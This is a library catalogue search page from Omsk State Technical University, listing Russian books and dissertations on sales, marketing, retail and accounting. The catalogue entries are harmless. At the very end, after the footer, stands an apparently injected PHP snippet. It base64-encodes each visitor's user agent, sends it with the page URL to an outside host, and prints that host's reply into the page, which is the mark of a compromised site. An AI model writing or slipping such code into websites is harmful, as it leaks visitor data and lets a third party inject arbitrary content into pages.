Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

153 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Покупка")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 103
1. 
Фокс, Джефри Дж. Как стать волшебником продаж [Текст] : Правила привлечения и удержания клиентов / Д. Д. Фокс; Пер. с англ. А. Лисовского, 2004. - 169 с.
Держатели документа (Информация об экземплярах) 
2. 
Глушакова Т. И. Реклама в малом бизнесе [Текст] / Т. И. Глушакова, И. Я. Рожков, 1996. - 76 с.
Держатели документа (Информация об экземплярах) 
3. 
Суринов, Александр Евгеньевич. Уровень жизни населения России: 1992-2002 гг. (по материалам официальных статистических наблюдений) [Текст] / А. Е. Суринов, 2003. - 279 с.
Держатели документа (Информация об экземплярах) 
4. 
Алферова Л. А. Маркетинг [Текст] : Учеб. пособие / Л. А. Алферова, 2000. - 67 с.
Держатели документа (Информация об экземплярах) 
5. 
Никишкин, Валерий Викторович. Маркетинг розничной торговли [Текст] / В. В. Никишкин, 2004. - 209, [1] с.
6. 
Варлей, Розмари. Управление розничными продажами. Мерчандайзинг [Текст] : Учеб. / Р. Варлей; Науч. ред. А. С. Ветров, 2004. - 271 с.

Учебник предоставляет читателю возможность получить углубленные знания в рассматриваемой сфере розничного менеджмента -управление ассортиментом <продукции>. В учебнике установлена связь между существующей научной теорией, действующей практикой осуществления торговых операций в данной отрасли и торговыми функциями внутри организаций, занимающихся розничным бизнесом: приобретение <товара> при помощи управления рынком, затем распределение продукта в товарном пространстве и внутри розничной сферы. Учебник может стать полезным источником информации для изучающих управление розничными продажами или же сферу <купли-продажи>.

7. 
Коблик, Сергей Владимирович. Управление конкурентоспособностью товара на рынке с развитой конкуренцией (на примере рынка телеаппаратуры Хабаровского края) [Текст] : Автореф. дис.. канд. экон. наук: 08.00.05 - Экономика и управление народным хозяйством: экономика, организация и управление предприятиями, отраслями, комплексами (промышленность) / С. В. Коблик, 2005. - 23 с.
Держатели документа (Информация об экземплярах) 
8. 
Сатарова, Мария Николаевна. Формирование и особенности функционирования маркетинговых информационных систем на предприятиях химической промышленности [Текст] : Автореф. дис.. канд. экон. наук: 08.00.05 - Экономика и управление народным хозяйством (3. Маркетинг) / М. Н. Сатарова, 2005. - 18 с.
Держатели документа (Информация об экземплярах) 
9. 
Браун, Крис. Практическое пособие по стимулированию сбыта [Текст] / К. Браун; Пер. с англ. А. В. Кузнецова, 2003. - 380, [1] с.
Держатели документа (Информация об экземплярах) 
10. 
Корнеева, Инна Леонидовна. Жилищное право Российской Федерации [Текст] : Учеб. пособие / И. Л. Корнеева, 2002. - 314 с.
11. 
Козырев А. А. Мотивация потребителей [Текст] / А. А. Козырев, 2003. - 383 с.
Ключевые слова 
12. 
Леви, Майкл. Основы розничной торговли [Текст] / М. Леви, А. Вейтц; С. Жильцов, Ю. Н. Коптуревский, 1999. - 446 с.
Ключевые слова 
Торговля -- Розничная торговля -- Покупатель -- Конкурент -- Бизнес -- Менеджмент -- Фирма -- Торговля-микс -- Собственность -- Франчайзер -- Покупка -- Рынок -- Товар -- Принятие решения -- стратегическое планирование -- Магазин -- Управление товаром -- Планирование -- Ассортимент -- Закупка -- Поставщик -- Переговоры -- Ценообразование -- Цена -- Бюджет -- Коммуникация -- Сбыт -- Связь с общественностью -- Стимулирование -- Менеджер -- Обучение -- Заработная плата -- Вознаграждение -- Дизайн -- Обслуживание -- Продажа -- Модный товар -- Услуга -- Компания
13. 
Энджел, Джеймс. Поведение потребителей [Текст] / Ф. Энджел, Д. Блэкуэлл, У. Миниард; Л. Волкова, Т. Принцева, 1999. - 759 с.
14. 
Дурович, Александр Петрович. Маркетинг в предпринимательской деятельности [Текст] / А. П. Дурович, 1997. - 462 с.
15. 
Басовский, Леонид Ефимович. Маркетинг [Текст] : Курс лекций / Л. Е. Басовский, 1999. - 218 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Курс лекций -- Маркетинговая деятельность -- Покупатель -- Покупка -- Маркетинговое исследование -- Сегментация рынка -- Товарная марка -- Товар -- Упаковка -- Услуга -- Ценообразование -- Товародвижение -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Реклама -- Стимулирование сбыта -- Стратегическое управление -- Стратегическое планирование -- Маркетинг услуг -- Некоммерческий маркетинг
Держатели документа (Информация об экземплярах) 
16. 
Басовский, Леонид Ефимович. Маркетинг [Текст] : Курс лекций / Л. Е. Басовский, 2000. - 218 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Маркетинговая деятельность -- Маркетинговая среда -- Покупатель -- Потребитель -- Покупка -- Рынок -- Маркетинговое исследование -- Сегментация рынка -- Товар -- Товарная марка -- Упаковка -- Услуга -- Ценообразование -- Товародвижение -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Реклама -- Стимулирование -- Пропаганда -- Стратегическое управление -- Международный маркетинг -- Некоммерческий маркетинг
Держатели документа (Информация об экземплярах) 
17. 
Канаян, Кира. Мерчандайзинг [Текст] / К. Канаян, Р. Канаян, 2002. - 234 с.
Держатели документа (Информация об экземплярах) 
18. 
Канаян, Кира. Мерчандайзинг [Текст] / К. Канаян, Р. Канаян, 2001. - 234 с.
Держатели документа (Информация об экземплярах) 
19. 
Тоболова, Людмила Ивановна. Бухгалтерский учет на предприятии [Текст] : Учеб. пособие / Л. И. Тоболова, Л. С. Лантушенко, 2001. - 108 с.
Оглавление 
  • Введение
  • Учет денежных средств
  • Учет кассовых операций
  • Учет операций по расчетному счету
  • Специальные счета в банках
  • Учет расчетных операций
  • Расчет с подотчетными лицами
  • Учет труда и заработной платы
  • Учет основных средств
  • Организация учета основных средств
  • Инвентаризация основных средств
  • Учет поступления основных средств
  • Износ основных средств
  • Учет перемещения основных средств внутри предприятия и их выбытие
  • Учет материально-производственных запасов
  • Документальное оформление поступления и выбытия материалов
  • Методы учета материалов
  • Синтетический учет материалов
  • Отражение в учете неотфактурованных поставок
  • Отражение в учете материальных ценностей в пути
  • Учет суммовых разниц при расчетах за материалы по курсу валюты
  • Использование товарных векселей при расчетах с поставщиками и подрядчиками
  • Учет расчетов по претензиям
  • Учет претензий по недостаче при поступлении материальных ценностей
  • Учет затрат на производство продукции (работ, услуг) и финансовых результатов
  • Виды затрат
  • Методы учета затрат
  • Порядок формирования финансовых результатов деятельности организации
  • Учет собственного капитала
  • Уставный капитал
  • Складочный капитал
  • Добавочный капитал
  • Резервный капитал и фонд социальной сферы
  • Нераспределенная прибыль
  • Фонды специального назначения
  • Учет заемных средств
  • Понятие кредитов и займов. Их отличительные особенности
  • Налоговые кредиты
  • Облигации как разновидность кредита
  • Финансовые векселя
  • Субсидии и субвенции
  • Ипотечные кредиты
  • Учет финансовых вложений
  • Классификация финансовых вложений
  • Учет вкладов и другие уставные капиталы
  • Учет финансовых вложений в ценные бумаги
  • Учет курсовой разницы
  • Покупка инвалюты под импортный контракт и продажа инвалюты
  • Учет финансовых вложений в займы
Держатели документа (Информация об экземплярах) 
Полный текст
20. 
Продажа [Текст] : Для студентов эконом. специальностей вузов: Пер. с англ., 1994. - 69 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2963 - 21.07.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.95 с.12 запросов, 0.59c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;